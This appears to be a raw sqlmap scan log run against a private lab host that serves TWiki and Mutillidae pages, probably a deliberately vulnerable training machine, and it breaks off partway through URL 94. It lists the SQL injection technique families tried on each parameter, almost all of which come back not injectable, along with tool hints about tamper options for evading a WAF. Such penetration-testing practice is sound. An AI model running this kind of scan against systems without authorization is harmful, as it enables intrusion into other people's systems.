[19:15:03] [INFO] testing for SQL injection on GET parameter 'skin'
[19:15:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:03] [WARNING] reflective value(s) found and filtering out
[19:15:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:15:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:15:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:15:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:15:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:15:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:15:06] [INFO] testing 'MySQL inline queries'
[19:15:06] [INFO] testing 'PostgreSQL inline queries'
[19:15:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:15:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:15:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:15:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:15:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:15:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:15:09] [INFO] testing 'Oracle AND time-based blind'
[19:15:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:15:10] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:15:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:15:21] [WARNING] GET parameter 'skin' is not injectable
[19:15:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 88:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.8&rev2=1.7
do you want to test this URL? [Y/n/q]
> Y
[19:15:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.8&rev2=1.7'
[19:15:21] [INFO] testing connection to the target URL
[19:15:21] [INFO] testing if the target URL is stable
[19:15:22] [INFO] target URL is stable
[19:15:22] [INFO] testing if GET parameter 'rev1' is dynamic
[19:15:22] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:15:22] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:15:22] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:15:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:15:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:15:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:15:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:15:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:15:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:15:25] [INFO] testing 'MySQL inline queries'
[19:15:26] [INFO] testing 'PostgreSQL inline queries'
[19:15:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:15:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:15:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:15:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:15:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:15:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:15:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:15:29] [INFO] testing 'Oracle AND time-based blind'
[19:15:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:15:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:15:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:15:42] [WARNING] GET parameter 'rev1' is not injectable
[19:15:42] [INFO] testing if GET parameter 'rev2' is dynamic
[19:15:42] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:15:42] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:15:42] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:15:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:15:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:15:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:15:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:15:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:15:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:15:46] [INFO] testing 'MySQL inline queries'
[19:15:46] [INFO] testing 'PostgreSQL inline queries'
[19:15:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:15:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:15:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:15:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:15:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:15:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:15:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:15:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:15:49] [INFO] testing 'Oracle AND time-based blind'
[19:15:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:15:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:16:02] [WARNING] GET parameter 'rev2' is not injectable
[19:16:02] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 89:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.7
do you want to test this URL? [Y/n/q]
> Y
[19:16:02] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.7'
[19:16:02] [INFO] testing connection to the target URL
[19:16:03] [INFO] testing if the target URL is stable
[19:16:04] [INFO] target URL is stable
[19:16:04] [INFO] testing if GET parameter 'rev' is dynamic
[19:16:04] [INFO] confirming that GET parameter 'rev' is dynamic
[19:16:04] [INFO] GET parameter 'rev' is dynamic
[19:16:04] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:16:04] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:16:04] [INFO] testing for SQL injection on GET parameter 'rev'
[19:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:16:04] [WARNING] reflective value(s) found and filtering out
[19:16:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:16:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:16:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:16:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:16:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:16:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:16:08] [INFO] testing 'MySQL inline queries'
[19:16:08] [INFO] testing 'PostgreSQL inline queries'
[19:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:16:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:16:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:16:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:16:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:16:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:16:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:16:11] [INFO] testing 'Oracle AND time-based blind'
[19:16:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:16:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:16:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:16:23] [WARNING] GET parameter 'rev' is not injectable
[19:16:23] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:16:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.7&rev2=1.6'
[19:16:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.6'
URL 90:
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebNotify?template=oopsmore&param1=1.8&param2=1.8
do you want to test this URL? [Y/n/q]
> Y
[19:16:23] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebNotify?template=oopsmore&param1=1.8&param2=1.8'
[19:16:23] [INFO] testing connection to the target URL
[19:16:24] [INFO] testing if the target URL is stable
[19:16:25] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:16:25] [INFO] testing if GET parameter 'template' is dynamic
[19:16:25] [INFO] confirming that GET parameter 'template' is dynamic
[19:16:25] [INFO] GET parameter 'template' is dynamic
[19:16:25] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:16:25] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:16:25] [INFO] testing for SQL injection on GET parameter 'template'
[19:16:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:16:25] [INFO] heuristics detected web page charset 'ascii'
[19:16:25] [WARNING] reflective value(s) found and filtering out
[19:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:16:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:16:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:16:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:16:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:16:28] [INFO] testing 'MySQL inline queries'
[19:16:28] [INFO] testing 'PostgreSQL inline queries'
[19:16:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:16:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:16:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:16:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:16:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:16:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:16:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:16:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:16:30] [INFO] testing 'Oracle AND time-based blind'
[19:16:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:16:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:16:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:16:40] [WARNING] GET parameter 'template' is not injectable
[19:16:40] [INFO] testing if GET parameter 'param1' is dynamic
[19:16:40] [WARNING] GET parameter 'param1' does not appear dynamic
[19:16:40] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:16:40] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:16:40] [INFO] testing for SQL injection on GET parameter 'param1'
[19:16:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:16:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:16:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:16:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:16:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:16:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:16:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:16:44] [INFO] testing 'MySQL inline queries'
[19:16:44] [INFO] testing 'PostgreSQL inline queries'
[19:16:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:16:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:16:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:16:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:16:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:16:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:16:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:16:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:16:47] [INFO] testing 'Oracle AND time-based blind'
[19:16:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:16:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:17:00] [WARNING] GET parameter 'param1' is not injectable
[19:17:00] [INFO] testing if GET parameter 'param2' is dynamic
[19:17:00] [WARNING] GET parameter 'param2' does not appear dynamic
[19:17:00] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:17:00] [INFO] testing for SQL injection on GET parameter 'param2'
[19:17:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:17:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:17:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:17:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:17:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:17:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:17:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:17:04] [INFO] testing 'MySQL inline queries'
[19:17:04] [INFO] testing 'PostgreSQL inline queries'
[19:17:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:17:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:17:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:17:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:17:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:17:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:17:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:17:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:17:07] [INFO] testing 'Oracle AND time-based blind'
[19:17:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:17:14] [INFO] target URL appears to be UNION injectable with 1 columns
[19:17:14] [WARNING] applying generic concatenation with double pipes ('||')
[19:17:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:17:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:17:21] [WARNING] GET parameter 'param2' is not injectable
[19:17:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print&rev=1.19'
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.21'
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.21&param2=1.19'
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=usage-instructions.php'
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=redirectandlog.php'
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=credits.php'
URL 91:
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100
do you want to test this URL? [Y/n/q]
> Y
[19:17:21] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:17:21] [INFO] testing connection to the target URL
[19:17:22] [INFO] testing if the target URL is stable
[19:17:22] [INFO] target URL is stable
[19:17:22] [INFO] testing if URI parameter '#1*' is dynamic
[19:17:22] [INFO] confirming that URI parameter '#1*' is dynamic
[19:17:22] [INFO] URI parameter '#1*' is dynamic
[19:17:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:17:23] [INFO] testing for SQL injection on URI parameter '#1*'
[19:17:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:17:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:17:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:17:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:17:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:17:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:17:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:17:26] [INFO] testing 'MySQL inline queries'
[19:17:26] [INFO] testing 'PostgreSQL inline queries'
[19:17:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:17:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:17:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:17:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:17:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:17:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:17:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:17:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:17:30] [INFO] testing 'Oracle AND time-based blind'
[19:17:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:17:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:17:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:17:43] [WARNING] URI parameter '#1*' is not injectable
[19:17:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 92:
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200
do you want to test this URL? [Y/n/q]
> Y
[19:17:43] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:17:43] [INFO] testing connection to the target URL
[19:17:44] [INFO] testing if the target URL is stable
[19:17:45] [INFO] target URL is stable
[19:17:45] [INFO] testing if URI parameter '#1*' is dynamic
[19:17:45] [INFO] confirming that URI parameter '#1*' is dynamic
[19:17:45] [WARNING] URI parameter '#1*' does not appear dynamic
[19:17:45] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:17:45] [INFO] testing for SQL injection on URI parameter '#1*'
[19:17:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:17:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:17:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:17:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:17:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:17:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:17:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:17:49] [INFO] testing 'MySQL inline queries'
[19:17:49] [INFO] testing 'PostgreSQL inline queries'
[19:17:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:17:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:17:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:17:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:17:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:17:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:17:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:17:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:17:53] [INFO] testing 'Oracle AND time-based blind'
[19:17:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:17:53] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:18:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:18:07] [WARNING] URI parameter '#1*' is not injectable
[19:18:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 93:
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400
do you want to test this URL? [Y/n/q]
> Y
[19:18:07] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:18:07] [INFO] testing connection to the target URL
[19:18:09] [INFO] testing if the target URL is stable
[19:18:09] [INFO] target URL is stable
[19:18:09] [INFO] testing if URI parameter '#1*' is dynamic
[19:18:09] [INFO] confirming that URI parameter '#1*' is dynamic
[19:18:10] [WARNING] URI parameter '#1*' does not appear dynamic
[19:18:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:18:10] [INFO] testing for SQL injection on URI parameter '#1*'
[19:18:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:18:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:18:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:18:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:18:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:18:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:18:14] [INFO] testing 'MySQL inline queries'
[19:18:14] [INFO] testing 'PostgreSQL inline queries'
[19:18:15] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:18:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:18:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:18:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:18:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:18:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:18:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:18:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:18:19] [INFO] testing 'Oracle AND time-based blind'
[19:18:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:18:19] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:18:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:18:33] [WARNING] URI parameter '#1*' is not injectable
[19:18:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 94:
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800
do you want to test this URL? [Y/n/q]
> Y
[19:18:33] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:18:33] [INFO] testing connection to the target URL
[19:18:34] [INFO] testing if the target URL is stable
[19:18:35] [INFO] target URL is stable
[19:18:35] [INFO] testing if URI parameter '#1*' is dynamic
[19:18:35] [INFO] confirming that URI parameter '#1*' is dynamic
[19:18:35] [WARNING] URI parameter '#1*' does not appear dynamic
[19:18:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:18:35] [INFO] testing for SQL injection on URI parameter '#1*'
[19:18:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:18:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:18:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:18:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:18:39] [INFO] testing 'MySQL inline queries'
[19:18:39] [INFO] testing 'PostgreSQL inline queries'
[19:18:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:18:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:18:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:18:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:18:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:18:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:18:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
